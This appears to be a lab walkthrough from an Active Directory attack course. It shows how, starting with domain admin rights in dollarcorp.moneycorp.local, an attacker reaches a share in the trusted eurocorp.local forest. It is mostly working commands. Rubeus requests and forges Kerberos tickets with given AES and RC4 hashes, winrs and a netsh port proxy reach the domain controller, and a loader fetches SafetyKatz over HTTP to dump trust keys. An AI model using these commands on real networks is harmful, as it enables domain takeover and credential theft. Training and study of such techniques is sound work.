With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest.
We need the trust key between dcorp and ecorp.
Let's start the process with DA privs, copy loader to dcorp-dc and setup port forwarding for Loader.
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72
# On student: Argsplit for "lsadump::trust"
# On svcadmin:
C:\Users\svcadmin> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"
We can now forge the inter-forest TGT ticket. Here we are not injecting SID History as it would be filtered.
# Argsplit silver
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:142b07ad5c09b715a883c5014044421d /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /nowrap
Copy the base64 TGT ticket and use Rubeus to request a TGS and inject it.
C:\AD\Tools\Rubeus.exe asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:doIGFjCCBhKgAwIBBaEDAgEWooIE4jCCBN5hggTaMIIE1qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa.....
Since the ticket is imported, we can now access the shared folder on eurocorp-dc
C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
Last updated